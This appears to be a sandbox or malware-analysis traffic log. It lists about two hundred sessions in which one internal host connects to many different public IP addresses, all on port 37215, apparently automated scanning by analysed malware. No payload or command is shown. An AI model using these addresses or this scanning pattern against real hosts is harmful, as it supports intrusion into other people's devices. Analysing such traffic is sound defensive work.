                                                  17524192.168.2.136024848.43.159.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17525192.168.2.135686441.0.29.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17526192.168.2.134671495.136.81.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17527192.168.2.1356960197.133.31.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17528192.168.2.1358206197.245.242.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17529192.168.2.1355918223.115.83.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17530192.168.2.1343124157.229.153.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17531192.168.2.133627295.116.243.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17532192.168.2.1341690197.122.194.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17533192.168.2.134330641.51.0.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17534192.168.2.1358104197.173.140.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17535192.168.2.1350462197.95.99.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17536192.168.2.1360126197.75.225.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17537192.168.2.135659841.232.22.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17538192.168.2.1342742197.176.153.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17539192.168.2.1349028157.237.231.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17540192.168.2.1334360197.185.73.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17541192.168.2.135461441.156.6.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17542192.168.2.1346308104.33.194.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17543192.168.2.1340922198.129.244.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17544192.168.2.1333114186.35.210.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17545192.168.2.1337282197.92.157.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17546192.168.2.1341798117.115.189.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17547192.168.2.136088641.229.180.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17548192.168.2.1353012198.150.176.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17549192.168.2.1344540197.142.173.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17550192.168.2.1344088197.139.69.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17551192.168.2.1350408157.141.65.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17552192.168.2.1359664132.187.83.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17553192.168.2.135082841.251.50.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17554192.168.2.134860641.132.31.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17555192.168.2.134565441.78.72.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17556192.168.2.135427841.13.185.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17557192.168.2.1346296151.37.196.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17558192.168.2.1335966157.27.146.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17559192.168.2.1333812148.224.240.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17560192.168.2.1354098195.162.102.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17561192.168.2.133961441.203.79.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17562192.168.2.1342182197.3.81.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17563192.168.2.1351546157.92.161.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17564192.168.2.1334644157.121.213.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17565192.168.2.134696041.139.218.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17566192.168.2.133287241.208.52.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17567192.168.2.134229241.112.45.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17568192.168.2.1344024157.91.31.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17569192.168.2.134921641.129.204.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17570192.168.2.1345020150.185.213.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17571192.168.2.1358510157.189.203.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17572192.168.2.13607769.252.142.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17573192.168.2.134359274.104.13.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17574192.168.2.1353678131.243.148.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17575192.168.2.1360112197.22.147.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17576192.168.2.133434041.11.30.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17577192.168.2.1339314197.130.47.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17578192.168.2.136004625.216.244.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17579192.168.2.1357646197.2.236.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17580192.168.2.1341586197.136.94.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17581192.168.2.135856041.178.230.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17582192.168.2.1348654157.21.165.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17583192.168.2.1349322157.57.191.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17584192.168.2.1345370159.26.190.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17585192.168.2.1345616157.250.129.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17586192.168.2.1356714220.158.198.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17587192.168.2.1345090197.180.240.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17588192.168.2.1343528145.133.75.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17589192.168.2.133332641.68.232.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17590192.168.2.1344916157.97.5.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17591192.168.2.1339860157.175.119.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17592192.168.2.1346206101.138.76.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17593192.168.2.134678276.231.225.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17594192.168.2.1353004197.171.249.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17595192.168.2.135128841.29.134.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17596192.168.2.1346914197.178.112.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17597192.168.2.1351896197.160.96.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17598192.168.2.1350466157.173.93.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17599192.168.2.134366694.159.106.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17600192.168.2.1347558157.217.1.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17601192.168.2.135322041.54.129.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17602192.168.2.135428241.218.213.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17603192.168.2.1354124157.107.181.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17604192.168.2.1348676157.226.121.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17605192.168.2.134680041.113.24.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17606192.168.2.135307037.41.13.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17607192.168.2.1332906197.162.214.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17608192.168.2.134467441.54.34.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17609192.168.2.133705841.208.128.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17610192.168.2.1335742197.96.36.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17611192.168.2.1339008157.240.231.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17612192.168.2.134356241.132.35.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17613192.168.2.1354582157.36.108.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17614192.168.2.1351502157.116.62.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17615192.168.2.1347756157.66.161.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17616192.168.2.1339406164.214.172.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17617192.168.2.1350608124.222.139.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17618192.168.2.133556820.110.75.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17619192.168.2.133867441.229.106.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17620192.168.2.134723041.87.253.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17621192.168.2.1346536185.177.223.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17622192.168.2.134809641.169.111.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17623192.168.2.1353958191.114.232.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17624192.168.2.1340244197.187.13.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17625192.168.2.1354016157.134.242.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17626192.168.2.135593441.208.57.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17627192.168.2.1336842157.211.155.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17628192.168.2.1349732197.75.62.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17629192.168.2.135530041.108.222.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17630192.168.2.133745441.152.250.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17631192.168.2.134243841.91.194.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17632192.168.2.134721639.52.186.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17633192.168.2.1354198197.60.205.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17634192.168.2.1345070157.153.255.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17635192.168.2.134024841.252.32.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17636192.168.2.1360956168.252.253.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17637192.168.2.1353856140.20.167.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17638192.168.2.135157041.96.240.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17639192.168.2.1346842197.102.229.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17640192.168.2.135334041.79.134.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17641192.168.2.1336918197.52.146.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17642192.168.2.1353480157.196.68.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17643192.168.2.133424857.17.12.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17644192.168.2.1352924157.151.100.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17645192.168.2.1341806173.252.21.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17646192.168.2.1355542157.81.62.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17647192.168.2.135785641.25.255.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17648192.168.2.1349988197.58.116.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17649192.168.2.1335418203.213.227.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17650192.168.2.135891041.111.110.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17651192.168.2.134619841.35.118.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17652192.168.2.134066664.252.0.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17653192.168.2.135048241.215.136.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17654192.168.2.1351464102.75.41.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17655192.168.2.134250641.92.56.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17656192.168.2.1353806157.148.174.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17657192.168.2.1342006157.42.49.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17658192.168.2.134839641.182.72.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17659192.168.2.1355558197.218.176.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17660192.168.2.1347342197.106.107.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17661192.168.2.135683041.255.150.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17662192.168.2.1344140197.44.111.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17663192.168.2.135220046.61.196.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17664192.168.2.1357804197.209.31.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17665192.168.2.134841012.35.81.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17666192.168.2.135834441.110.162.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17667192.168.2.1356788197.184.94.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17668192.168.2.1353412197.93.217.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17669192.168.2.1336186190.173.222.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17670192.168.2.1341932197.120.79.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17671192.168.2.135796285.44.143.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17672192.168.2.1342988197.236.113.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17673192.168.2.134193441.221.106.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17674192.168.2.135286041.98.11.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17675192.168.2.1355746222.66.118.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17676192.168.2.1336848197.179.212.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17677192.168.2.135767841.172.42.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17678192.168.2.1353574197.87.23.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17679192.168.2.1357864197.118.122.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17680192.168.2.134444241.109.21.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17681192.168.2.1351834197.101.163.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17682192.168.2.1343584157.219.96.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17683192.168.2.1349294157.112.90.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17684192.168.2.134646841.98.140.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17685192.168.2.1335466197.21.63.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17686192.168.2.1338092197.96.63.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17687192.168.2.1346170197.179.235.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17688192.168.2.133310458.236.182.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17689192.168.2.1358520198.38.124.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17690192.168.2.1358508157.140.143.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17691192.168.2.1336908157.238.31.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17692192.168.2.1348352141.37.194.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17693192.168.2.1339826157.158.102.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17694192.168.2.1350082157.164.255.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17695192.168.2.1351266157.107.76.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17696192.168.2.1346958197.110.242.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17697192.168.2.1352552157.139.160.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17698192.168.2.135131241.194.159.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17699192.168.2.1344630197.116.115.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17700192.168.2.1338658101.230.77.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17701192.168.2.1353606197.250.148.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17702192.168.2.133712836.162.41.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17703192.168.2.1352082197.119.188.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17704192.168.2.135454841.24.136.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17705192.168.2.1345400197.163.204.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17706192.168.2.1342976209.253.41.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17707192.168.2.1355656192.103.159.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17708192.168.2.134030060.39.67.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17709192.168.2.135299241.193.5.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17710192.168.2.1342748197.40.127.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17711192.168.2.135410241.117.77.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17712192.168.2.1339592157.116.146.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17713192.168.2.134624041.39.220.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17714192.168.2.1349242197.225.18.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17715192.168.2.1336462157.248.95.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17716192.168.2.134915841.163.100.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17717192.168.2.1352388101.190.66.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17718192.168.2.1337490131.177.101.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17719192.168.2.135871841.22.30.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17720192.168.2.134620041.24.177.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17721192.168.2.1350458125.145.11.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17722192.168.2.1341100157.59.175.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17723192.168.2.1336456197.55.164.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17724192.168.2.1351514157.110.218.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17725192.168.2.1337254197.57.79.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17726192.168.2.133842641.227.144.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17727192.168.2.135820241.182.69.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17728192.168.2.135598841.36.251.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17729192.168.2.1347852157.49.11.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17730192.168.2.134744841.133.107.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17731192.168.2.1351882157.255.137.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17732192.168.2.135972241.188.29.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17733192.168.2.1358042157.30.254.16537215
